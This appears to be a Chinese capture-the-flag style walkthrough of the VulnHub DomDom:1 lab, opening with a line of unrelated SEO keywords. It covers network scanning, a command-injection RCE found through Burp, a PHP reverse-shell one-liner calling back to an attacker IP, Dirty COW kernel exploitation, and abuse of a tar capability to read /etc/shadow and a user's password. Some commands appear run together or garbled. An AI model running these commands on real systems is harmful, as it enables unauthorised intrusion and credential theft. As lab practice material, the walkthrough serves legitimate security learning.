好的网站特点,推广联盟平台,企业展厅布展设计公司,佛山高端外贸网站建设靶场下载地址#xff1a;
https://www.vulnhub.com/entry/domdom-1,328/
一、信息收集
获取主机ip
nmap -sP 192.168.16.0/24netdiscover -r 192.168.16.0/24端口版本获取 nmap -sV -sC -A -p 1-65535 192.168.16.209开放端口只有80 目录扫描
这里扫描php后缀的文件
g…靶场下载地址
https://www.vulnhub.com/entry/domdom-1,328/
一、信息收集
获取主机ip
nmap -sP 192.168.16.0/24netdiscover -r 192.168.16.0/24端口版本获取 nmap -sV -sC -A -p 1-65535 192.168.16.209开放端口只有80 目录扫描
这里扫描php后缀的文件
gobuster dir -u http://192.168.16.209 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php这里扫描出两个目录一个/index.php,一个 /admin.php.
二、RCE漏洞利用
查看登录的网站 抓包
使用burpsuite抓取登录后的包 把index.php更改为admin.php,发现存在cmd执行 参数更改
nameadusernameadpasswordadaccessaccesscmdls命令被成功执行 nc反弹
1.开启监听
nc -lvnp 90022.反弹shell
这里使用python的shell
php -r $sockfsockopen(192.168.16.180,9002);exec(/bin/sh -i 3 3 23);进行加密后执行 会话获取成功 切换bash
python3 -c import pty;pty.spawn(/bin/bash)这里推荐一个
https://www.revshells.com/ 网站生成反弹shell网站
三、方法一、脏牛提权
获取版本
uname -a得到系统版本为Linux ubuntu 4.4.0-21-generic
漏洞检测
漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester
下载到kali
使用
python -m http.server或者直接
wget https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh 添加上执行权限
chomd x linux-exploit-suggester.sh执行 脏牛漏洞利用
exp下载wget https://www.exploit-db.com/download/40616
编译这里编译会报错不用管
gcc exp.c -o exp -pthread添加执行权限
chmod x exp运行提权成功 四、方法二、密码登陆提权
Linux系统利用可执行文件的Capabilities实现权限提升 - FreeBuf网络安全行业门户
Capabilities机制是在Linux内核2.2之后引入的原理很简单就是将之前与超级用户rootUID0关联的特权细分为不同的功能组
“Capabilities”能力机制是一种计算机安全模型用于限制一个进程或用户在操作系统中能够执行的特定操作。它基于原则即每个主体进程或用户只被授予执行特定操作所需的最低权限。
1.现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件
getcap -r / 2/dev/null2.Linux内核中Capabilities的实现机制对比
linux Capabilities简介–#setcap cap_net_raw,cap_net_admineip /a.out | (moonsec.com)
这里tar命令可以绕过文件的读权限检查以及目录的读/执行权限的检查。
/bin/tar cap_dac_read_searchep利用此特性我们可以读取系统中的敏感信息。
tar cvf shadow.tar /etc/shadow //创建压缩文件tar -xvf shadow.tar //解压缩chmod r shadow //赋予读权限cat shadow | grep root //查看shadow文件的内容读取了/etc/shadow文件的内容
这里
tar -cvf domom.tar /home/domom
#打包home下的目录解压
tar -xvf domom.tar切换目录到桌面
ls 发现有个README.md查看最后得到密码Mj7AGmPR-mVfRy{}LJRBS5nc*V.#a登录成功